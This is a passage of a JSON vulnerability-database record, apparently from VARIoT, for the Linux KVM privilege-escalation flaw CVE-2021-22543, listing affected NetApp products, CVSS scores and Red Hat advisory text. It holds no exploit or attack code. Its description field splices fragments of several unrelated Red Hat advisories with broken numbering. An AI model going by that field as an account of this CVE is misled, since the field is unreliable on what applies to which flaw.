                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "db": "PACKETSTORM",
        "id": "163861"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-22543",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-380980",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-22543",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-22543",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-380980",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-22543",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. Arch Linux is an application system of Arch open source. A lightweight and flexible Linux\u00ae distribution that tries to keep it simple. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security update\nAdvisory ID:       RHSA-2021:3812-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:3812\nIssue date:        2021-10-12\nCVE Names:         CVE-2021-3653 CVE-2021-3656 CVE-2021-22543\n                   CVE-2021-22555 CVE-2021-37576\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.6\nAdvanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.6 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.6) - noarch, ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.6) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.6):\n\nSource:\nkernel-3.10.0-957.84.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.84.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm\nperf-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.6):\n\nSource:\nkernel-3.10.0-957.84.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.84.1.el7.noarch.rpm\n\nppc64le:\nkernel-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-957.84.1.el7.ppc64le.rpm\nperf-3.10.0-957.84.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\npython-perf-3.10.0-957.84.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm\nperf-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.6):\n\nSource:\nkernel-3.10.0-957.84.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm\nkernel-doc-3.10.0-957.84.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-devel-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-headers-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm\nperf-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.6):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6):\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-957.84.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.6):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-3653\nhttps://access.redhat.com/security/cve/CVE-2021-3656\nhttps://access.redhat.com/security/cve/CVE-2021-22543\nhttps://access.redhat.com/security/cve/CVE-2021-22555\nhttps://access.redhat.com/security/cve/CVE-2021-37576\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYWWkrNzjgjWX9erEAQgeVg//eBUd0HQYAc3u6Nc1nBOOBM+SWHAI6rwT\nSWbLidMennvaCylOWpdL23fkpPkhCRyj5fbXen2dQGtUop2sEm6nmVLFW6cQO8Yv\nrfXN3wnrW8P0Ah3QtWeV1O22ah8WzcgeML96xyUl3K7yJSY+evXYYBUM7Q8nbzW1\n0K7VJm79SxRsszcNq3R/mG5MuPJV+cSnSlG+1cqK+A+YRVKDIE/7vWiTS1z9GDlY\n/DIlKzvEcsyaOFnKYg+RQRQ5HCB5Hp2JNjRrz5F+X+KJRoT6KTDlbFY/a34FjYWA\nfUN3pA0aQtdGgQsAB6+T+pVGTYq0vRWPOXhnN2OaN7a95OwbVC9DmiQXwjLQnn2C\nrvU52ExQP6Jf+WfNHo7yfFMgR1Eyihkc+/zf0qPQomuEqMjEfqyMXOoPsCoXotGs\nOBJEVIYvBmA7CYif9L0cQRNJyTFfv1IcXKgP2UgrGdChQnLBz/ijVUU17HcU783R\nG6hXh2+Ojllbt5/rf2PQfFZYjswIVuGe9/You+T6qQXJ+zInz1GOi92+Vwv+gEGF\nKNLqZJ1nvB1xOm60noCBhnke5vPbzFA+YNGSJnc0tLxZ6Dek891Qb1Eq1f+rwR/9\nwfCEgECYLoGvlc2RXC12m13BLUTL+VjVyc0KmG/O9vjFD42EzeFo8rpuXjVsF7QJ\nS627544rR1c=4NQZ\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.3 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with\nsecurity policy built in. \n\nSecurity fixes: \n\n* nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a\npointer to a root domain name (CVE-2021-23017)\n\n* redis: Lua scripts can overflow the heap-based Lua stack (CVE-2021-32626)\n\n* redis: Integer overflow issue with Streams (CVE-2021-32627)\n\n* redis: Integer overflow bug in the ziplist data structure\n(CVE-2021-32628)\n\n* redis: Integer overflow issue with intsets (CVE-2021-32687)\n\n* redis: Integer overflow issue with strings (CVE-2021-41099)\n\n* redis: Out of bounds read in lua debugger protocol parser\n(CVE-2021-32672)\n\n* redis: Denial of service via Redis Standard Protocol (RESP) request\n(CVE-2021-32675)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\nBug fixes:\n\n* KUBE-API: Support move agent to different cluster in the same namespace\n(BZ# 1977358)\n\n* Add columns to the Agent CRD list (BZ# 1977398)\n\n* ClusterDeployment controller watches all Secrets from all namespaces (BZ#\n1986081)\n\n* RHACM 2.3.3 images (BZ# 1999365)\n\n* Workaround for Network Manager not supporting nmconnections priority (BZ#\n2001294)\n\n* create cluster page empty in Safary Browser (BZ# 2002280)\n\n* Compliance state doesn\u0027t get updated after fixing the issue causing\ninitially the policy not being able to update the managed object (BZ#\n2002667)\n\n* Overview page displays VMware based managed cluster as other (BZ#\n2004188)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963121 - CVE-2021-23017 nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name\n1977358 - [4.8.0] KUBE-API: Support move agent to different cluster in the same namespace\n1977398 - [4.8.0] [master] Add columns to the Agent CRD list\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1986081 - [4.8.0] ClusterDeployment controller watches all Secrets from all namespaces\n1999365 - RHACM 2.3.3 images\n2001294 - [4.8.0] Workaround for Network Manager not supporting nmconnections priority\n2002280 - create cluster page empty in Safary Browser\n2002667 - Compliance state doesn\u0027t get updated after fixing the issue causing initially the policy not being able to update the managed object\n2004188 - Overview page displays VMware based managed cluster as other\n2010991 - CVE-2021-32687 redis: Integer overflow issue with intsets\n2011000 - CVE-2021-32675 redis: Denial of service via Redis Standard Protocol (RESP) request\n2011001 - CVE-2021-32672 redis: Out of bounds read in lua debugger protocol parser\n2011004 - CVE-2021-32628 redis: Integer overflow bug in the ziplist data structure\n2011010 - CVE-2021-32627 redis: Integer overflow issue with Streams\n2011017 - CVE-2021-32626 redis: Lua scripts can overflow the heap-based Lua stack\n2011020 - CVE-2021-41099 redis: Integer overflow issue with strings\n\n5. \nThese packages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nBug Fix(es):\n\n* Rebase package(s) to version: 1.2.23\n\nHighlights, important fixes, or notable enhancements: \n\n* imgbase should not copy the selinux binary policy file (BZ# 1979624)\n(BZ#1989397)\n\n* RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. \n(BZ#1975177)\n\n4. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* Urgent: Missing dptf_power.ko module in RHEL8 (BZ#1968381)\n\n* [mlx5] kdump over NFS fails: mlx5 driver gives error \"Stop room 95 is\nbigger than the SQ size 64\" (BZ#1969909)\n\n* BUG: unable to handle kernel NULL pointer dereference at 0000000000000000\nin bluetooth  hci_error_reset on intel-tigerlake-h01 (BZ#1972564)\n\n* Update CIFS to kernel 5.10 (BZ#1973637)\n\n* Backport \"tick/nohz: Conditionally restart tick on idle exit\" to RHEL 8.5\n(BZ#1978710)\n\n* Significant performance drop starting on kernel-4.18.0-277 visible on\nmmap benchmark (BZ#1980314)\n\n* Inaccessible NFS server overloads clients\n(native_queued_spin_lock_slowpath connotation?) (BZ#1980613)\n\n* [RHEL8.4 BUG],RialtoMLK, I915 graphic driver failed to boot with one new\n120HZ panel (BZ#1981250)\n\n* act_ct: subject to DNAT tuple collision (BZ#1982494)\n\nEnhancement(s):\n\n* [Lenovo 8.5 FEAT] drivers/nvme - Update to the latest upstream\n(BZ#1965415)\n\n4. 7.3) - x86_64\n\n3. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.28. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2021:3263\n\nSpace precludes documenting all of the container images in this advisory. \n\nBug Fix(es):\n\n* Machine Config Operator degrades during cluster update with failed to\nconvert Ignition config spec v2 to v3 (BZ#1956462)\n\n* OCP IPI Publish Internal - GCP: Load Balancer service with External\nTraffic Policy as Local is not working (BZ#1971669)\n\n* [4.7] Unable to attach Vsphere volume shows the error \"failed to get\ncanonical path\" (BZ#1973766)\n\n* oc logs doesn\u0027t work with piepeline builds (BZ#1974264)\n\n* \"provisioned registration errors\" cannot be reported (BZ#1976924)\n\n* AWS Elastic IP permissions are incorrectly required (BZ#1981553)\n\n* Memory consumption (container_memory_rss) steadily growing for\n/system.slice/kubelet.service when FIPS enabled [ocp 4.7] (BZ#1981580)\n\n* Problematic Deployment creates infinite number Replicasets causing etcd\nto reach quota limit (BZ#1981775)\n\n* Size of the hostname was preventing proper DNS resolution of the worker\nnode names (BZ#1983695)\n\n* (release-4.7) Insights status card shows nothing when 0 issues found\n(BZ#1986724)\n\n* drop-icmp pod blocks direct SSH access to cluster nodes (BZ#1988426)\n\n* Editing a Deployment drops annotations (BZ#1989642)\n\n* [Kuryr][4.7] Duplicated egress rule for service network in knp object\n(BZ#1990175)\n\n* Update failed - ovn-nbctl: duplicate nexthop for the same ECMP route\n(BZ#1991445)\n\n* Unable to install a zVM hosted OCP 4.7.24 on Z Cluster based on new RHCOS\n47 RHEL 8.4 based build (BZ#1992240)\n\n* alerts: SystemMemoryExceedsReservation triggers too quickly (BZ#1992687)\n\n* failed to start cri-o service due to /usr/libexec/crio/conmon is missing\n(BZ#1993386)\n\n* Thanos build failure: vendor/ ignored (BZ#1994123)\n\n* Ipv6 IP addresses are not accepted for whitelisting (BZ#1994645)\n\n* upgrade from 4.6 to 4.7 to 4.8 with mcp worker \"paused=true\",  crio\nreport \"panic: close of closed channel\" which lead to a master Node go into\nRestart loop (BZ#1994729)\n\n* linuxptp-daemon crash on 4.8 (BZ#1995579)\n\n* long living clusters may fail to upgrade because of an invalid conmon\npath (BZ#1995810)\n\nFor more details about the security issue(s), refer to the CVE\npage(s) listed in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.28-x86_64\n\nThe image digest is\nsha256:b3f38d58057a12b0477bf28971390db3e3391ce1af8ac06e35d0aa9e8d8e5966\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.28-s390x\n\nThe image digest is\nsha256:30c2011f6d84b16960b981a07558f96a55e59a281449d25c5ccc778aaeb2f970\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.28-ppc64le\n\nThe image digest is\nsha256:52ebf0db5a36434357c24a64863025730d2159a94997333f15fbe1444fa88f4f\n\nInstructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1863446 - [Assisted-4.5-M2]  clean all does not remove ConfigMaps and  PVC\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1956462 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3\n1971669 - OCP IPI Publish Internal - GCP: Load Balancer service with External Traffic Policy as Local is not working\n1973766 - [4.7] Unable to attach Vsphere volume shows the error \"failed to get canonical path\"\n1974264 - oc logs doesn\u0027t work with piepeline builds\n1976924 - \"provisioned registration errors\" cannot be reported\n1981553 - AWS Elastic IP permissions are incorrectly required\n1981775 - Problematic Deployment creates infinite number Replicasets causing etcd to reach quota limit\n1983695 - Size of the hostname was preventing proper DNS resolution of the worker node names\n1986724 - (release-4.7) Insights status card shows nothing when 0 issues found\n1988426 - drop-icmp pod blocks direct SSH access to cluster nodes\n1989642 - Editing a 